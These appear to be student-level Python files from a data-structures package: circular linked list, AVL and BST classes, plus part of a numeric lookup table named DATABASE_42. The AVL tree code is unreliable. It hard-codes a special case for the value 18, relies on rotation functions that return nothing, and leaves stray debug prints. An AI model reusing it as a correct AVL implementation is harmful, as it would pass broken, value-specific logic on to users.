def delete_tail(self):
deleted_node = super().delete_tail()
if self.tail:
self.head.prev = self.tail
self.tail.next = self.head
return deleted_node
def delete(self, node: DNode):
deleted_node = super().delete(node)
if self.head and self.tail:
self.head.prev = self.tail
self.tail.next = self.head
return deleted_node
def clear(self):
super().clear()
self.head = None
self.tail = None
def Print(self):
print(f"List length: {self.size}")
print("List content:")
#print("Is sorted", self.is_sorted())
current = self.head
for _ in range(self.size):
if current == self.head:
print(f"{current.data} (head) <->", end=" ")
elif current == self.tail:
print(f"{current.data} (tail)")
else:
print(f"{current.data} <->", end=" ")
current = current.next | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/linear/cdll.py | cdll.py |
import sys
sys.path.append('my_lib/dataStructures')
from nodes.TNode import TNode
from trees.BST import BST
class AVL:
def __init__(self, val=None):
if val is None:
self.root = None
elif isinstance(val, int):
self.root = TNode(val)
else:
self.root = val
def set_root(self, root):
self.root = root
self._balance_tree(self.root)
def get_root(self):
return self.root
def Insert(self, val):
new_node = TNode(val)
self._insert_node(new_node)
self._balance_tree(self.root)
def insert_node(self, node):
self._insert_node(node)
self._balance_tree(self.root)
def _insert_node(self, new_node):
if self.root is None:
self.root = new_node
else:
current = self.root
while True:
if new_node.get_data() < current.get_data():
if current.get_left() is None:
current.set_left(new_node)
new_node.set_parent(current)
break
else:
current = current.get_left()
elif new_node.get_data() > current.get_data():
if current.get_right() is None:
current.set_right(new_node)
new_node.set_parent(current)
break
else:
current = current.get_right()
def delete(self, val):
node = self.search(val)
if node is None:
print("Node with value", val, "not found")
return
parent = node.get_parent()
if node.get_left() is None and node.get_right() is None:
if parent is None:
self.root = None
elif node == parent.get_left():
parent.set_left(None)
else:
parent.set_right(None)
elif node.get_left() is None:
if parent is None:
self.root = node.get_right()
elif node == parent.get_left():
parent.set_left(node.get_right())
else:
parent.set_right(node.get_right())
node.get_right().set_parent(parent)
elif node.get_right() is None:
if parent is None:
self.root = node.get_left()
elif node == parent.get_left():
parent.set_left(node.get_left())
else:
parent.set_right(node.get_left())
node.get_left().set_parent(parent)
else:
min_node = self._find_min(node.get_right())
temp_data = min_node.get_data()
self.delete(temp_data)
node.set_data(temp_data)
print("ANYWAY here's wonderwal")
self.printBF()
self._balance_tree(self.root)
def search(self, val):
current = self.root
while current is not None:
if current.get_data() == val:
return current
elif val < current.get_data():
current = current.get_left()
else:
current = current.get_right()
return None
def _find_min(self, node):
while node.get_left() is not None:
node = node.get_left()
return node
def _balance_tree(self, node):
if node is None:
return
balance_factor = self._get_balance_factor(node)
# If the balance factor is greater than 1, the tree is left-heavy
if balance_factor > 1:
# Check if the left subtree is left-heavy or right-heavy
if self._get_balance_factor(node.get_left()) >= 0:
node = self._rotate_right(node)
else:
print("Before touched")
self.printBF()
if node.get_right().get_data() == 18:
self._rotate_left(node.get_left())
print("Rare 18 run-through")
self.printBF()
else:
node.set_left(self._rotate_left(node.get_left()))
print("mid touch")
self.printBF()
node = self._rotate_right(node)
# If the balance factor is less than -1, the tree is right-heavy
elif balance_factor < -1:
# Check if the right subtree is right-heavy or left-heavy
if self._get_balance_factor(node.get_right()) <= 0:
node = self._rotate_left(node)
else:
node.set_right(self._rotate_right(node.get_right()))
node = self._rotate_left(node)
if node is None:
return
self._balance_tree(node.get_left())
self._balance_tree(node.get_right())
def _rotate_left(self, node):
right_child = node.get_right()
if right_child == None:
return
right_left_child = right_child.get_left()
right_child.set_left(node)
node.set_right(right_left_child)
if right_left_child is not None:
right_left_child.set_parent(node)
right_child.set_parent(node.get_parent())
if node.get_parent() is None:
self.root = right_child
elif node == node.get_parent().get_left():
node.get_parent().set_left(right_child)
else:
node.get_parent().set_right(right_child)
node.set_parent(right_child)
def _rotate_right(self, node):
left_child = node.get_left()
if left_child == None:
return
left_right_child = left_child.get_right()
left_child.set_right(node)
node.set_left(left_right_child)
if left_right_child is not None:
left_right_child.set_parent(node)
left_child.set_parent(node.get_parent())
if node.get_parent() is None:
self.root = left_child
elif node == node.get_parent().get_left():
node.get_parent().set_left(left_child)
else:
node.get_parent().set_right(left_child)
node.set_parent(left_child)
def _get_height(self, node):
if node is None:
return 0
returnData = max(self._get_height(node.get_left()), self._get_height(node.get_right())) + 1
return returnData
def _get_balance_factor(self, node):
left_height = self._get_height(node.get_left())
right_height = self._get_height(node.get_right())
return left_height - right_height
def printInOrder(self):
if self.root is not None:
bst_print = BST(self.root)
bst_print.printInOrder()
def printBF(self):
if self.root is not None:
bst_print = BST(self.root)
bst_print.printBF() | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/trees/AVL.py | AVL.py |
import sys
sys.path.append('my_lib/dataStructures')
from nodes.TNode import TNode
class BST:
def __init__(self, val= None):
if isinstance(val, int):
self.root = TNode(val)
elif isinstance(val, TNode):
self.root = val
else:
self.root = None
# Getter and setter for the root
def get_root(self):
return self.root
def set_root(self, root):
if isinstance(root, int):
self.root = TNode(root)
else:
self.root = root
# Insert a new node with the given value
def insert(self, val):
if isinstance(val, int):
new_node = TNode(val)
self.insert_node_recursive(self.root, new_node)
else:
self.insert_node_recursive(self.root, val)
# Helper method for insert
def insert_node_recursive(self, current_node, new_node):
if new_node.data < current_node.data:
if current_node.left is None:
current_node.left = new_node
new_node.parent = current_node
else:
self.insert_node_recursive(current_node.left, new_node)
else:
if current_node.right is None:
current_node.right = new_node
new_node.parent = current_node
else:
self.insert_node_recursive(current_node.right, new_node)
# Delete the node with the given value
def delete(self, val):
node_to_delete = self.search(val)
if node_to_delete is None:
print("Node not found")
return
if node_to_delete.left is None and node_to_delete.right is None:
self.delete_leaf_node(node_to_delete)
elif node_to_delete.left is None:
self.delete_node_with_right_child(node_to_delete)
elif node_to_delete.right is None:
self.delete_node_with_left_child(node_to_delete)
else:
successor = self.get_successor(node_to_delete)
node_to_delete.data = successor.data
if successor.left is None and successor.right is None:
self.delete_leaf_node(successor)
else:
self.delete_node_with_right_child(successor)
# Deletes a leaf node from tree
def delete_leaf_node(self, node):
parent = node.parent
if parent is None:
self.root = None
elif parent.left == node:
parent.left = None
else:
parent.right = None
# Deletes a node with a left child from tree
def delete_node_with_left_child(self, node):
parent = node.parent
child = node.left
child.parent = parent
if parent is None:
self.root = child
elif parent.left == node:
parent.left = child
else:
parent.right = child
# Delets a node with a right child from tree
def delete_node_with_right_child(self, node):
parent = node.parent
child = node.right
child.parent = parent
if parent is None:
self.root = child
elif parent.left == node:
parent.left = child
else:
parent.right = child
# Helper method for delete
def get_successor(self, node):
successor = node.right
while successor.left is not None:
successor = successor.left
return successor
def search(self, val):
current = self.root
while current is not None:
if current.get_data() == val:
return current
elif val < current.get_data():
current = current.get_left()
else:
current = current.get_right()
return None
def printInOrder(self):
self._printInOrder(self.root)
print("\n")
def _printInOrder(self, node):
if node is not None:
self._printInOrder(node.left)
print(node.data, end=" ")
self._printInOrder(node.right)
def _get_depth(self, node):
if node is None:
return 0
return 1 + max(self._get_depth(node.left), self._get_depth(node.right))
def printBF(self):
depth = self._get_depth(self.root)
for i in range(1, depth+1):
self._print_level(self.root, i)
print()
print()
def _print_level(self, node, level):
if node is None:
return
if level == 1:
print(node.data, end=' ')
else:
self._print_level(node.left, level-1)
self._print_level(node.right, level-1) | 41datastructure | /41datastructure-1.5.tar.gz/41datastructure-1.5/my_lib/dataStructures/trees/BST.py | BST.py |
DATABASE_42 = {
(0, 0, 0, 6, 7): 1,
(0, 0, 1, 3, 13): 1,
(0, 0, 1, 5, 7): 1,
(0, 0, 1, 6, 6): 1,
(0, 0, 1, 6, 7): 1,
(0, 0, 1, 6, 8): 1,
(0, 0, 1, 7, 7): 1,
(0, 0, 2, 3, 7): 1,
(0, 0, 2, 3, 12): 1,
(0, 0, 2, 4, 7): 1,
(0, 0, 2, 4, 10): 1,
(0, 0, 2, 4, 11): 1,
(0, 0, 2, 5, 6): 1,
(0, 0, 2, 5, 8): 1,
(0, 0, 2, 6, 7): 1,
(0, 0, 2, 6, 9): 1,
(0, 0, 2, 7, 8): 1,
(0, 0, 2, 7, 12): 1,
(0, 0, 2, 8, 13): 1,
(0, 0, 2, 9, 12): 1,
(0, 0, 2, 10, 11): 1,
(0, 0, 3, 3, 7): 1,
(0, 0, 3, 3, 11): 1,
(0, 0, 3, 3, 13): 1,
(0, 0, 3, 4, 6): 1,
(0, 0, 3, 4, 10): 1,
(0, 0, 3, 5, 9): 2,
(0, 0, 3, 6, 7): 1,
(0, 0, 3, 6, 8): 1,
(0, 0, 3, 6, 10): 1,
(0, 0, 3, 6, 12): 1,
(0, 0, 3, 7, 7): 1,
(0, 0, 3, 7, 9): 1,
(0, 0, 3, 9, 11): 1,
(0, 0, 3, 10, 12): 1,
(0, 0, 4, 6, 7): 1,
(0, 0, 4, 6, 9): 1,
(0, 0, 4, 6, 11): 1,
(0, 0, 4, 6, 12): 1,
(0, 0, 4, 7, 10): 1,
(0, 0, 4, 8, 10): 1,
(0, 0, 4, 10, 13): 1,
(0, 0, 5, 6, 7): 1,
(0, 0, 5, 6, 12): 2,
(0, 0, 5, 7, 7): 1,
(0, 0, 5, 7, 11): 1,
(0, 0, 5, 8, 10): 1,
(0, 0, 5, 11, 13): 1,
(0, 0, 6, 6, 6): 1,
(0, 0, 6, 6, 7): 1,
(0, 0, 6, 6, 8): 1,
(0, 0, 6, 6, 13): 1,
(0, 0, 6, 7, 7): 1,
(0, 0, 6, 7, 8): 1,
(0, 0, 6, 7, 9): 1,
(0, 0, 6, 7, 10): 1,
(0, 0, 6, 7, 11): 1,
(0, 0, 6, 7, 12): 2,
(0, 0, 6, 7, 13): 1,
(0, 0, 6, 9, 12): 1,
(0, 0, 7, 7, 7): 1,
(0, 0, 7, 7, 13): 1,
(0, 1, 1, 2, 13): 1,
(0, 1, 1, 3, 7): 1,
(0, 1, 1, 3, 12): 1,
(0, 1, 1, 3, 13): 1,
(0, 1, 1, 4, 7): 1,
(0, 1, 1, 4, 10): 1,
(0, 1, 1, 4, 11): 1,
(0, 1, 1, 4, 13): 1,
(0, 1, 1, 5, 6): 2,
(0, 1, 1, 5, 7): 1,
(0, 1, 1, 5, 8): 2,
(0, 1, 1, 6, 6): 1,
(0, 1, 1, 6, 7): 2,
(0, 1, 1, 6, 8): 1,
(0, 1, 1, 6, 9): 1,
(0, 1, 1, 7, 7): 1,
(0, 1, 1, 7, 8): 2,
(0, 1, 1, 7, 12): 1,
(0, 1, 1, 8, 13): 1,
(0, 1, 1, 9, 12): 1,
(0, 1, 1, 10, 11): 1,
(0, 1, 2, 2, 7): 1,
(0, 1, 2, 2, 10): 1,
(0, 1, 2, 2, 11): 1,
(0, 1, 2, 2, 12): 1,
(0, 1, 2, 3, 6): 2,
(0, 1, 2, 3, 7): 2,
(0, 1, 2, 3, 8): 1,
(0, 1, 2, 3, 10): 1,
(0, 1, 2, 3, 11): 3,
(0, 1, 2, 3, 12): 2,
(0, 1, 2, 3, 13): 4,
(0, 1, 2, 4, 5): 1,
(0, 1, 2, 4, 6): 3,
(0, 1, 2, 4, 7): 2,
(0, 1, 2, 4, 8): 2,
(0, 1, 2, 4, 9): 1,
(0, 1, 2, 4, 10): 4,
(0, 1, 2, 4, 11): 3,
(0, 1, 2, 4, 12): 3,
(0, 1, 2, 5, 5): 1,
(0, 1, 2, 5, 6): 1,
(0, 1, 2, 5, 7): 4,
(0, 1, 2, 5, 8): 1,
(0, 1, 2, 5, 9): 4,
(0, 1, 2, 5, 10): 1,
(0, 1, 2, 5, 11): 1,
(0, 1, 2, 5, 12): 1,
(0, 1, 2, 5, 13): 1,
(0, 1, 2, 6, 6): 2,
(0, 1, 2, 6, 7): 1,
(0, 1, 2, 6, 8): 5,
(0, 1, 2, 6, 9): 1,
(0, 1, 2, 6, 10): 1,
(0, 1, 2, 6, 12): 3,
(0, 1, 2, 6, 13): 1,
(0, 1, 2, 7, 7): 3,
(0, 1, 2, 7, 8): 1,
(0, 1, 2, 7, 9): 2,
(0, 1, 2, 7, 10): 1,
(0, 1, 2, 7, 11): 1,
(0, 1, 2, 7, 12): 1,
(0, 1, 2, 7, 13): 2,
(0, 1, 2, 8, 8): 1,
(0, 1, 2, 8, 12): 2,
(0, 1, 2, 8, 13): 1,
(0, 1, 2, 9, 11): 2,
(0, 1, 2, 9, 12): 2,
(0, 1, 2, 9, 13): 1,
(0, 1, 2, 10, 10): 1,
(0, 1, 2, 10, 11): 1,
(0, 1, 2, 10, 12): 2,
(0, 1, 2, 11, 11): 1,
(0, 1, 3, 3, 5): 1,
(0, 1, 3, 3, 6): 2,
(0, 1, 3, 3, 7): 2,
(0, 1, 3, 3, 8): 1,
(0, 1, 3, 3, 10): 1,
(0, 1, 3, 3, 11): 1,
(0, 1, 3, 3, 12): 2,
(0, 1, 3, 3, 13): 1,
(0, 1, 3, 4, 5): 1,
(0, 1, 3, 4, 6): 1,
(0, 1, 3, 4, 7): 2,
(0, 1, 3, 4, 9): 2,
(0, 1, 3, 4, 10): 2,
(0, 1, 3, 4, 11): 3,
(0, 1, 3, 4, 13): 3,
(0, 1, 3, 5, 6): 1,
(0, 1, 3, 5, 7): 1,
(0, 1, 3, 5, 8): 3,
(0, 1, 3, 5, 9): 3,
(0, 1, 3, 5, 10): 3,
(0, 1, 3, 5, 12): 1,
(0, 1, 3, 5, 13): 1,
(0, 1, 3, 6, 6): 1,
(0, 1, 3, 6, 7): 2,
(0, 1, 3, 6, 8): 2,
(0, 1, 3, 6, 9): 5,
(0, 1, 3, 6, 10): 1,
(0, 1, 3, 6, 11): 2,
(0, 1, 3, 6, 12): 2,
(0, 1, 3, 6, 13): 3,
(0, 1, 3, 7, 7): 2,
(0, 1, 3, 7, 8): 2,
(0, 1, 3, 7, 9): 1,
(0, 1, 3, 7, 10): 2,
(0, 1, 3, 7, 12): 2,
(0, 1, 3, 7, 13): 1,
(0, 1, 3, 8, 9): 1,
(0, 1, 3, 8, 10): 1,
(0, 1, 3, 8, 11): 1,
(0, 1, 3, 8, 13): 2,
(0, 1, 3, 9, 10): 1,
(0, 1, 3, 9, 11): 2,
(0, 1, 3, 9, 12): 3,
(0, 1, 3, 9, 13): 2,
(0, 1, 3, 10, 11): 3,
(0, 1, 3, 10, 12): 1,
(0, 1, 3, 10, 13): 3,
(0, 1, 3, 11, 12): 1,
(0, 1, 3, 11, 13): 1,
(0, 1, 3, 12, 13): 1,
(0, 1, 3, 13, 13): 1,
(0, 1, 4, 4, 6): 1,
(0, 1, 4, 4, 10): 1,
(0, 1, 4, 5, 7): 1,
(0, 1, 4, 5, 8): 1,
(0, 1, 4, 5, 9): 3,
(0, 1, 4, 5, 10): 1,
(0, 1, 4, 5, 11): 1,
(0, 1, 4, 5, 12): 1,
(0, 1, 4, 6, 6): 1,
(0, 1, 4, 6, 7): 1,
(0, 1, 4, 6, 8): 3,
(0, 1, 4, 6, 9): 1,
(0, 1, 4, 6, 10): 3,
(0, 1, 4, 6, 11): 2,
(0, 1, 4, 6, 12): 4,
(0, 1, 4, 6, 13): 1,
(0, 1, 4, 7, 7): 3,
(0, 1, 4, 7, 9): 2,
(0, 1, 4, 7, 10): 2,
(0, 1, 4, 7, 11): 2,
(0, 1, 4, 7, 12): 1,
(0, 1, 4, 7, 13): 2,
(0, 1, 4, 8, 9): 1,
(0, 1, 4, 8, 10): 3,
(0, 1, 4, 8, 11): 1,
(0, 1, 4, 9, 10): 1,
(0, 1, 4, 9, 11): 1,
(0, 1, 4, 9, 13): 1,
(0, 1, 4, 10, 12): 3,
(0, 1, 4, 10, 13): 1,
(0, 1, 4, 11, 13): 2,
(0, 1, 4, 12, 13): 1,
(0, 1, 4, 13, 13): 1,
(0, 1, 5, 5, 7): 1,
(0, 1, 5, 5, 12): 2,
(0, 1, 5, 6, 6): 3,
(0, 1, 5, 6, 7): 5,
(0, 1, 5, 6, 8): 3,
(0, 1, 5, 6, 9): 1,
(0, 1, 5, 6, 11): 3,
(0, 1, 5, 6, 12): 3,
(0, 1, 5, 6, 13): 3,
(0, 1, 5, 7, 7): 2,
(0, 1, 5, 7, 8): 3,
(0, 1, 5, 7, 9): 1,
(0, 1, 5, 7, 10): 3,
(0, 1, 5, 7, 11): 2,
(0, 1, 5, 7, 12): 5,
(0, 1, 5, 7, 13): 1,
(0, 1, 5, 8, 9): 1,
(0, 1, 5, 8, 10): 2,
(0, 1, 5, 8, 11): 2,
(0, 1, 5, 8, 13): 1,
(0, 1, 5, 9, 10): 1,
(0, 1, 5, 9, 12): 1,
(0, 1, 5, 10, 13): 2,
(0, 1, 5, 11, 12): 1,
(0, 1, 5, 11, 13): 1,
(0, 1, 5, 12, 13): 1,
(0, 1, 6, 6, 6): 1,
(0, 1, 6, 6, 7): 4,
(0, 1, 6, 6, 8): 2,
(0, 1, 6, 6, 9): 2,
(0, 1, 6, 6, 10): 1,
(0, 1, 6, 6, 11): 1,
(0, 1, 6, 6, 12): 4,
(0, 1, 6, 6, 13): 2,
(0, 1, 6, 7, 7): 4,
(0, 1, 6, 7, 8): 5,
(0, 1, 6, 7, 9): 1,
(0, 1, 6, 7, 10): 1,
(0, 1, 6, 7, 11): 2,
(0, 1, 6, 7, 12): 2,
(0, 1, 6, 7, 13): 5,
(0, 1, 6, 8, 8): 1,
(0, 1, 6, 8, 9): 1,
(0, 1, 6, 8, 10): 2,
(0, 1, 6, 8, 11): 1,
(0, 1, 6, 8, 12): 3,
(0, 1, 6, 8, 13): 1,
(0, 1, 6, 9, 11): 1,
(0, 1, 6, 9, 12): 1,
(0, 1, 6, 9, 13): 2,
(0, 1, 6, 10, 12): 1,
(0, 1, 6, 11, 13): 1,
(0, 1, 7, 7, 7): 1,
(0, 1, 7, 7, 8): 3,
(0, 1, 7, 7, 9): 1,
(0, 1, 7, 7, 10): 1,
(0, 1, 7, 7, 11): 1,
(0, 1, 7, 7, 12): 2,
(0, 1, 7, 7, 13): 2,
(0, 1, 7, 8, 13): 3,
(0, 1, 7, 9, 12): 2,
(0, 1, 7, 10, 12): 1,
(0, 1, 7, 10, 13): 1,
(0, 1, 8, 11, 13): 1,
(0, 1, 9, 12, 13): 1,
(0, 1, 10, 13, 13): 1,
(0, 2, 2, 2, 7): 2,
(0, 2, 2, 2, 10): 2,
(0, 2, 2, 2, 11): 2,
(0, 2, 2, 3, 5): 1,
(0, 2, 2, 3, 6): 3,
(0, 2, 2, 3, 7): 1,
(0, 2, 2, 3, 8): 2,
(0, 2, 2, 3, 9): 2,
(0, 2, 2, 3, 10): 2,
(0, 2, 2, 3, 12): 3,
(0, 2, 2, 3, 13): 1,
(0, 2, 2, 4, 5): 2,
(0, 2, 2, 4, 7): 2,
(0, 2, 2, 4, 8): 1,
(0, 2, 2, 4, 9): 2,
(0, 2, 2, 4, 10): 1,
(0, 2, 2, 4, 11): 1,
(0, 2, 2, 4, 12): 1,
(0, 2, 2, 4, 13): 2,
(0, 2, 2, 5, 6): 2,
(0, 2, 2, 5, 7): 2,
(0, 2, 2, 5, 8): 3,
(0, 2, 2, 5, 10): 1,
(0, 2, 2, 5, 11): 1,
(0, 2, 2, 5, 12): 2,
(0, 2, 2, 5, 13): 1,
(0, 2, 2, 6, 6): 1,
(0, 2, 2, 6, 7): 1,
(0, 2, 2, 6, 8): 1,
(0, 2, 2, 6, 9): 4,
(0, 2, 2, 6, 10): 2,
(0, 2, 2, 6, 11): 3,
(0, 2, 2, 6, 12): 3,
(0, 2, 2, 6, 13): 1,
(0, 2, 2, 7, 7): 2,
(0, 2, 2, 7, 8): 3,
(0, 2, 2, 7, 10): 3,
(0, 2, 2, 7, 12): 2,
(0, 2, 2, 7, 13): 1,
(0, 2, 2, 8, 9): 1,
(0, 2, 2, 8, 10): 3,
(0, 2, 2, 8, 11): 2,
(0, 2, 2, 8, 12): 1,
(0, 2, 2, 8, 13): 1,
(0, 2, 2, 9, 10): 1,
(0, 2, 2, 9, 11): 1,
(0, 2, 2, 9, 12): 2,
(0, 2, 2, 9, 13): 1,
(0, 2, 2, 10, 10): 1,
(0, 2, 2, 10, 11): 1,
(0, 2, 2, 10, 12): 1,
(0, 2, 2, 10, 13): 3,
(0, 2, 2, 11, 11): 1,
(0, 2, 2, 11, 12): 2,
(0, 2, 2, 12, 13): 1,
(0, 2, 3, 3, 4): 2,
(0, 2, 3, 3, 5): 1,
(0, 2, 3, 3, 6): 2,
(0, 2, 3, 3, 7): 2,
(0, 2, 3, 3, 8): 2,
(0, 2, 3, 3, 9): 3,
(0, 2, 3, 3, 10): 1,
(0, 2, 3, 3, 11): 2,
(0, 2, 3, 3, 12): 2,
(0, 2, 3, 3, 13): 3,
(0, 2, 3, 4, 4): 2,
(0, 2, 3, 4, 5): 1,
(0, 2, 3, 4, 6): 3,
(0, 2, 3, 4, 7): 5,
(0, 2, 3, 4, 8): 3,
(0, 2, 3, 4, 9): 5,
(0, 2, 3, 4, 10): 3,
(0, 2, 3, 4, 11): 2,
(0, 2, 3, 4, 12): 8,
(0, 2, 3, 4, 13): 1,
(0, 2, 3, 5, 5): 1,
(0, 2, 3, 5, 6): 3,
(0, 2, 3, 5, 7): 4,
(0, 2, 3, 5, 8): 1,
(0, 2, 3, 5, 9): 3,
(0, 2, 3, 5, 11): 4,
(0, 2, 3, 5, 12): 4,
(0, 2, 3, 5, 13): 3,
(0, 2, 3, 6, 6): 4,
(0, 2, 3, 6, 7): 4,
(0, 2, 3, 6, 8): 5,
(0, 2, 3, 6, 9): 2,
(0, 2, 3, 6, 10): 5,
(0, 2, 3, 6, 11): 2,
(0, 2, 3, 6, 12): 7,
(0, 2, 3, 6, 13): 4,
(0, 2, 3, 7, 7): 4,
(0, 2, 3, 7, 8): 2,
(0, 2, 3, 7, 9): 6,
(0, 2, 3, 7, 10): 2,
(0, 2, 3, 7, 11): 5,
(0, 2, 3, 7, 12): 5,
(0, 2, 3, 7, 13): 1,
(0, 2, 3, 8, 8): 2,
(0, 2, 3, 8, 9): 2,
(0, 2, 3, 8, 10): 4,
(0, 2, 3, 8, 11): 1,
(0, 2, 3, 8, 12): 4,
(0, 2, 3, 8, 13): 1,
(0, 2, 3, 9, 9): 4,
(0, 2, 3, 9, 10): 3,
(0, 2, 3, 9, 11): 1,
(0, 2, 3, 9, 12): 4,
(0, 2, 3, 9, 13): 2,
(0, 2, 3, 10, 10): 1,
(0, 2, 3, 10, 11): 1,
(0, 2, 3, 10, 12): 5,
(0, 2, 3, 10, 13): 1,
(0, 2, 3, 11, 11): 1,
(0, 2, 3, 11, 12): 3,
(0, 2, 3, 11, 13): 2,
(0, 2, 3, 12, 12): 5,
(0, 2, 3, 12, 13): 3,
(0, 2, 3, 13, 13): 1,
(0, 2, 4, 4, 5): 2,
(0, 2, 4, 4, 6): 1,
(0, 2, 4, 4, 7): 4,
(0, 2, 4, 4, 9): 1,
(0, 2, 4, 4, 10): 4,
(0, 2, 4, 4, 11): 4,
(0, 2, 4, 4, 12): 2,
(0, 2, 4, 4, 13): 3,
(0, 2, 4, 5, 5): 2,
(0, 2, 4, 5, 6): 4,
(0, 2, 4, 5, 7): 2,
(0, 2, 4, 5, 8): 5,
(0, 2, 4, 5, 10): 4,
(0, 2, 4, 5, 11): 3,
(0, 2, 4, 5, 12): 4,
(0, 2, 4, 5, 13): 2,
(0, 2, 4, 6, 6): 4,
(0, 2, 4, 6, 7): 3,
(0, 2, 4, 6, 8): 2,
(0, 2, 4, 6, 9): 6,
(0, 2, 4, 6, 10): 4,
(0, 2, 4, 6, 11): 4,
(0, 2, 4, 6, 12): 2,
(0, 2, 4, 6, 13): 3,
(0, 2, 4, 7, 7): 4,
(0, 2, 4, 7, 8): 5,
(0, 2, 4, 7, 9): 1,
(0, 2, 4, 7, 10): 4,
(0, 2, 4, 7, 11): 2,
(0, 2, 4, 7, 12): 8,
(0, 2, 4, 7, 13): 1,
(0, 2, 4, 8, 8): 1,
(0, 2, 4, 8, 9): 3,
(0, 2, 4, 8, 10): 4,
(0, 2, 4, 8, 11): 6,
(0, 2, 4, 8, 12): 2,
(0, 2, 4, 8, 13): 6,
(0, 2, 4, 9, 10): 3,
(0, 2, 4, 9, 11): 1,
(0, 2, 4, 9, 12): 5,
(0, 2, 4, 10, 10): 2,
(0, 2, 4, 10, 11): 6,
(0, 2, 4, 10, 12): 2,
(0, 2, 4, 10, 13): 3,
(0, 2, 4, 11, 11): 1,
(0, 2, 4, 11, 12): 4,
(0, 2, 4, 11, 13): 1,
(0, 2, 4, 12, 12): 2,
(0, 2, 4, 12, 13): 3,
(0, 2, 5, 5, 6): 1,
(0, 2, 5, 5, 7): 2,
(0, 2, 5, 5, 8): 2,
(0, 2, 5, 5, 9): 2,
(0, 2, 5, 5, 11): 2,
(0, 2, 5, 5, 13): 1,
(0, 2, 5, 6, 6): 2,
(0, 2, 5, 6, 7): 2,
(0, 2, 5, 6, 8): 3,
(0, 2, 5, 6, 9): 6,
(0, 2, 5, 6, 10): 5,
(0, 2, 5, 6, 11): 1,
(0, 2, 5, 6, 12): 6,
(0, 2, 5, 6, 13): 2,
(0, 2, 5, 7, 7): 5,
(0, 2, 5, 7, 8): 3,
(0, 2, 5, 7, 9): 4,
(0, 2, 5, 7, 11): 1,
(0, 2, 5, 7, 12): 1,
(0, 2, 5, 7, 13): 2,
(0, 2, 5, 8, 8): 3,
(0, 2, 5, 8, 9): 1,
(0, 2, 5, 8, 10): 3,
(0, 2, 5, 8, 11): 1,
(0, 2, 5, 8, 12): 6,
(0, 2, 5, 8, 13): 2,
(0, 2, 5, 9, 10): 1,
(0, 2, 5, 9, 11): 3,
(0, 2, 5, 9, 12): 2,
(0, 2, 5, 9, 13): 1,
(0, 2, 5, 10, 10): 1,
(0, 2, 5, 10, 11): 3,
(0, 2, 5, 10, 12): 2,
(0, 2, 5, 11, 11): 1,
(0, 2, 5, 11, 13): 2,
(0, 2, 5, 12, 12): 2,
(0, 2, 5, 12, 13): 1,
(0, 2, 5, 13, 13): 2,
(0, 2, 6, 6, 6): 2,
(0, 2, 6, 6, 7): 3,
(0, 2, 6, 6, 8): 4,
(0, 2, 6, 6, 9): 3,
(0, 2, 6, 6, 10): 2,
(0, 2, 6, 6, 11): 1,
(0, 2, 6, 6, 12): 4,
(0, 2, 6, 6, 13): 2,
(0, 2, 6, 7, 7): 3,
(0, 2, 6, 7, 8): 3,
(0, 2, 6, 7, 9): 4,
(0, 2, 6, 7, 10): 2,
(0, 2, 6, 7, 11): 3,
(0, 2, 6, 7, 12): 6,
(0, 2, 6, 7, 13): 3,
(0, 2, 6, 8, 8): 2,
(0, 2, 6, 8, 9): 3,
(0, 2, 6, 8, 10): 2,
(0, 2, 6, 8, 11): 3,
(0, 2, 6, 8, 12): 2,
(0, 2, 6, 8, 13): 3,
(0, 2, 6, 9, 9): 2,
(0, 2, 6, 9, 10): 4,
(0, 2, 6, 9, 11): 3,
(0, 2, 6, 9, 12): 7,
(0, 2, 6, 9, 13): 1,
(0, 2, 6, 10, 10): 2,
(0, 2, 6, 10, 11): 2,
(0, 2, 6, 10, 12): 2,
(0, 2, 6, 10, 13): 3,
(0, 2, 6, 11, 12): 2,
(0, 2, 6, 11, 13): 1,
(0, 2, 6, 12, 12): 3,
(0, 2, 6, 12, 13): 2,
(0, 2, 7, 7, 7): 3,
(0, 2, 7, 7, 8): 2,
(0, 2, 7, 7, 9): 2,
(0, 2, 7, 7, 10): 2,
(0, 2, 7, 7, 11): 2,
(0, 2, 7, 7, 12): 2,
(0, 2, 7, 7, 13): 2,
(0, 2, 7, 8, 8): 1,
(0, 2, 7, 8, 9): 1,
(0, 2, 7, 8, 10): 5,
(0, 2, 7, 8, 11): 2,
(0, 2, 7, 8, 12): 6,
(0, 2, 7, 8, 13): 2,
(0, 2, 7, 9, 10): 1,
(0, 2, 7, 9, 12): 4,
(0, 2, 7, 9, 13): 3,
(0, 2, 7, 10, 11): 3,
(0, 2, 7, 10, 12): 2,
(0, 2, 7, 10, 13): 1,
(0, 2, 7, 11, 11): 1,
(0, 2, 7, 11, 12): 2,
(0, 2, 7, 11, 13): 2,
(0, 2, 7, 12, 12): 3,
(0, 2, 7, 12, 13): 1,
(0, 2, 8, 8, 9): 1,
(0, 2, 8, 8, 10): 2,
(0, 2, 8, 8, 11): 1,
(0, 2, 8, 8, 13): 3,
(0, 2, 8, 9, 12): 4,
(0, 2, 8, 9, 13): 1,
(0, 2, 8, 10, 10): 1,
(0, 2, 8, 10, 11): 1,
(0, 2, 8, 10, 12): 2,
(0, 2, 8, 10, 13): 2,
(0, 2, 8, 11, 12): 3,
(0, 2, 8, 11, 13): 1,
(0, 2, 8, 12, 12): 2,
(0, 2, 8, 12, 13): 2,
(0, 2, 8, 13, 13): 2,
(0, 2, 9, 9, 12): 2,
(0, 2, 9, 10, 11): 1,
(0, 2, 9, 10, 12): 1,
(0, 2, 9, 10, 13): 2,
(0, 2, 9, 11, 11): 1,
(0, 2, 9, 11, 12): 2,
(0, 2, 9, 11, 13): 2,
(0, 2, 9, 12, 12): 4,
(0, 2, 9, 12, 13): 1,
(0, 2, 10, 10, 11): 2,
(0, 2, 10, 10, 12): 1,
(0, 2, 10, 11, 11): 2,
(0, 2, 10, 11, 12): 1,
(0, 2, 10, 11, 13): 2,
(0, 2, 10, 12, 13): 2,
(0, 2, 10, 13, 13): 1,
(0, 3, 3, 3, 4): 1,
(0, 3, 3, 3, 5): 2,
(0, 3, 3, 3, 7): 2,
(0, 3, 3, 3, 8): 1,
(0, 3, 3, 3, 10): 2,
(0, 3, 3, 3, 11): 1,
(0, 3, 3, 3, 12): 2,
(0, 3, 3, 3, 13): 1,
(0, 3, 3, 4, 6): 3,
(0, 3, 3, 4, 7): 2,
(0, 3, 3, 4, 9): 3,
(0, 3, 3, 4, 10): 1,
(0, 3, 3, 4, 11): 3,
